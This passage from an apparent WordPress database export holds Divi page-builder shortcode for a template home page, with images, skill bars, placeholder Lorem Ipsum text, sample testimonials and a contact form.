_builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-05.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-04.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Button Section\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" custom_padding=\"0px||90px|\"][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"See More\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Skill Section\" _builder_version=\"3.22\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Skills</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Skill\" _builder_version=\"3.25\" custom_padding=\"20px||10px|\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"flip\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It is a long established fact that a reader. It was popularised in the 1960s with the release.\r[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_counters bar_bg_color=\"#fcd21d\" use_percentages=\"off\" _builder_version=\"3.0.87\" title_font=\"Montserrat|||on|||||\" title_text_color=\"#353740\" title_font_size=\"12px\" title_letter_spacing=\"1px\" title_line_height=\"2em\" percent_font_size=\"1px\" custom_padding=\"|||\" animation_style=\"fold\" animation_direction=\"left\" animation_intensity_fold=\"30%\"][et_pb_counter percent=\"90\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#fcd21d\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Branding - 90%\r[/et_pb_counter][et_pb_counter percent=\"77\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#fcd21d\" use_percentages=\"off\" allow_player_pause_default=\"off\"]UX Research - 77%\r[/et_pb_counter][et_pb_counter percent=\"85%\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#fcd21d\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Interface Design - 85%\r[/et_pb_counter][/et_pb_counters][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Gradient Background Color Section\" _builder_version=\"3.22\" background_color_gradient_direction=\"90deg\" background_image=\"https://52.66.212.87/wp-content/uploads/2020/07/background-split-03-1.jpg\" custom_margin=\"||78px|\" custom_margin_tablet=\"||0px|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%||0px|\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/MB-purefront-02.png\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"||-56px|\" custom_margin_tablet=\"||10%|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1500ms\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"3.22\" custom_margin=\"40px||50px|\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"3.27.4\" text_text_color=\"#747d88\" text_font_size=\"24px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever.\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"140px\" padding_top_2=\"0px\" padding_left_1=\"10%\" admin_label=\"Feature Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"0px|||\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"100px\" box_shadow_color=\"#ffffff\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_left__hover=\"10%\" padding_top__hover=\"140px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Feature Titile\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"||10px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2>Award winning Design</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p><span>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Maecenas metus sapien, tempus nec lectus vitae, varius porttitor turpis. Ut sit amet tincidunt nulla, nec ultrices est. Aliquam sollicitudin tempor dui, ac accumsan metus vulputate sit amet. Donec placerat rutrum tellus et.</span></p>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Product\" use_icon=\"on\" font_icon=\"%%65%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"3.0.83\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation_style=\"fade\" animation_direction=\"bottom\"][/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Branding\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"3.0.82\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"][/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-06.jpg\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"6%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Testimonial Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Testimonial Title\" _builder_version=\"3.25\" custom_margin=\"|||\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat|on||on|\" text_text_color=\"#353740\" text_font_size=\"42px\" text_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\"]<p>From Our Clients</p>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"600px\" module_alignment=\"center\" custom_margin=\"|||\"]Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Testimonial\" _builder_version=\"3.25\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Mitch Skolnik\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_1.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Andrel Nahaev\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_3.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Eduard Ungureanu\" job_title=\"Tech Support\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_2.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Tom Ewer\" job_title=\"Blogger\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_5.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"3.22\" background_color=\"#fcd21d\" custom_padding=\"110px||110px|\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form captcha=\"off\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"3.23\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Company\" field_title=\"Company Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"3.16\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','134-revision-v1','','','2020-07-02 21:20:50','2020-07-02 21:20:50','',134,'https://52.66.212.87/2020/07/02/134-revision-v1/',0,'revision','',0),(166,1,'2020-07-02 21:24:56','2020-07-02 21:24:56','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.4.9\" background_color=\"#fcd21d\" background_image=\"https://52.66.212.87/wp-content/uploads/2020/07/Desktop-HD.png\" width=\"100%\" width_tablet=\"100%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"100%\" max_width_tablet=\"100%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"0px||0px|\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\" hover_enabled=\"0\" make_fullwidth=\"on\" title_text=\"Desktop HD\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"10%|8%|10%|8%\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.4.9\" text_font=\"||||||||\" header_font=\"Montserrat|700||on|||||\" header_text_color=\"#f7f7f7\" header_font_size=\"60px\" header_line_height=\"1.3em\" custom_margin=\"||40px|\" animation_style=\"fade\" hover_enabled=\"0\" header_font_size_last_edited=\"off|desktop\" locked=\"off\"]<h1 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Welcome to</span><br /><span style=\"color: #ffffff;\"> Advertising</span></h1>\n[/et_pb_text][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"20px\" text_line_height=\"1.8em\" header_font=\"||||||||\" custom_margin=\"||50px|\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"17%\" locked=\"off\"]<p style=\"text-align: center;\">It is a long established fact that a reader will be distracted by the readable content of a page when looking at its layout. The point of using Lorem Ipsum is that it has normal.</p>[/et_pb_text][et_pb_button button_text=\"Learn More\" _builder_version=\"4.4.9\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"4px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" animation_style=\"fade\" hover_enabled=\"0\" button_text_color_hover=\"#ffffff\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#ffffff\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#ffffff\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" button_alignment=\"center\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Service Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" 